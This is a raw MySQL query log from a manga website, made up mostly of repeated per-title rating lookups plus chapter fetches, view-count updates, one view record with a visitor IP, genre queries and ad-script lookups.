330659174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330659174 Quit 330659175 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330659175 Quit 330659176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330659176 Quit 330659177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330659177 Quit 330659178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330659178 Quit 330659179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330659179 Quit 330659180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330659180 Quit 330659181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330659181 Quit 330659182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330659182 Quit 330659183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330659183 Quit 330659184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330659184 Quit 330659185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330659185 Quit 330659186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330659186 Quit 330659187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330659187 Quit 330659188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330659188 Quit 330659189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330659189 Quit 330659190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330659190 Quit 330659191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330659191 Quit 330659192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330659192 Quit 330659193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330659193 Quit 330659194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330659194 Quit 330659195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330659195 Quit 330659196 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330659196 Quit 330659197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330659197 Quit 330659198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330659198 Quit 330659199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330659199 Quit 330659200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330659200 Quit 330659201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330659201 Quit 330659202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330659202 Quit 330659203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330659203 Quit 330659204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330659204 Quit 330659205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330659205 Quit 330659206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330659206 Quit 330659207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330659207 Quit 330659208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330659208 Quit 330659209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330659209 Quit 330659210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330659210 Quit 330659211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330659211 Quit 330659212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330659212 Quit 330659213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330659213 Quit 330659214 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330659214 Quit 330659215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330659215 Quit 330659216 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330659216 Quit 330659217 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330659217 Quit 330659218 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330659218 Quit 330659219 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330659219 Quit 330659220 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330659220 Quit 330659221 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330659221 Quit 330659222 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330659222 Quit 330659223 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330659223 Quit 330659224 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330659224 Quit 330659225 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330659225 Quit 330659226 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330659226 Quit 330659227 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330659227 Quit 330659228 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330659228 Quit 330659229 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330659229 Quit 330659230 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330659230 Quit 330659231 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330659231 Quit 330659232 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330659232 Quit 330659233 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330659233 Quit 330659234 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330659234 Quit 330659235 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330659235 Quit 330659236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330659236 Quit 330659237 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330659237 Quit 330659238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330659238 Quit 330659239 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330659239 Quit 330659240 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330659240 Quit 330659241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330659241 Quit 330659242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330659242 Quit 330659243 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330659243 Quit 330659244 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330659244 Quit 330659245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330659245 Quit 330659246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330659246 Quit 330659247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330659247 Quit 330659248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330659248 Quit 330659249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330659249 Quit 330659250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330659250 Quit 330659251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330659251 Quit 330659252 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330659252 Quit 330659253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330659253 Quit 330659254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330659254 Quit 330659255 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330659255 Quit 330659256 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330659256 Quit 330659257 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330659257 Quit 330659258 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330659258 Quit 330659259 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330659259 Quit 330659260 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330659260 Quit 330659261 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330659261 Quit 330659262 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330659262 Quit 330659263 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330659263 Quit 330659264 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330659264 Quit 330659265 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330659265 Quit 330659266 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330659266 Quit 330659267 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330659267 Quit 330659268 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330659268 Quit 330659269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330659269 Quit 330659270 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330659270 Quit 330659271 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330659271 Quit 330659272 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330659272 Quit 330659273 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330659273 Quit 330659274 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330659274 Quit 330659275 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330659275 Quit 330659276 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330659276 Quit 330659277 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330659277 Quit 330659278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330659278 Quit 330659279 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330659279 Quit 330659280 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330659280 Quit 330659281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330659281 Quit 330659282 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330659282 Quit 330659283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330659283 Quit 330659284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330659284 Quit 330659285 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330659285 Quit 330659286 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330659286 Quit 330659287 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330659287 Quit 330659288 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330659288 Quit 330659289 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330659289 Quit 330659290 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330659290 Quit 330659291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330659291 Quit 330659292 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330659292 Quit 330659293 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330659293 Quit 330659294 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330659294 Quit 330659295 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330659295 Quit 330659296 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330659296 Quit 330659297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330659297 Quit 330659298 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330659298 Quit 330659299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330659299 Quit 330659300 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330659300 Quit 330659301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330659301 Quit 330659302 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330659302 Quit 330659303 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330659303 Quit 330659304 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330659304 Quit 330659305 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659306 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659305 Quit 330659306 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1886' and m.active = 1 330659306 Quit 330659307 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659307 Query select * FROM chapters where id = '1886' 330659307 Quit 330659308 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659308 Query select * FROM chapters where manga_id = '100' order by display_priority ASC, id desc 330659308 Quit 330659309 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659309 Query Update chapters set view=view+1 where id = '1886' 330659309 Quit 330659310 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659310 Query select * FROM chapters where id = '1886' 330659310 Quit 330659311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659311 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1886' and m.active = 1 330659311 Quit 330659312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659312 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('100', '1886', '83.136.182.181', 'mangaberri.com', '2026-02-26 03:30:02', '2026-02-26 03:30:02') 330659312 Quit 330659313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659313 Query select * FROM chapter_images where chapter_id = '1886' 330659313 Quit 330659314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659314 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '100' and m.active = 1 330659314 Quit 330659315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659315 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='100' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330659315 Quit 330659316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659316 Quit 330659317 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659317 Quit 330659318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659318 Quit 330659319 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659319 Quit 330659320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659321 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659320 Quit 330659321 Quit 330659322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659322 Quit 330659323 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659323 Quit 330659324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659324 Quit 330659325 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4616' and m.active = 1 330659325 Quit 330659326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659326 Query select * FROM chapters where id = '4616' 330659326 Quit 330659327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659327 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330659327 Quit 330659328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659328 Query Update chapters set view=view+1 where id = '4616' 330659328 Quit 330659329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 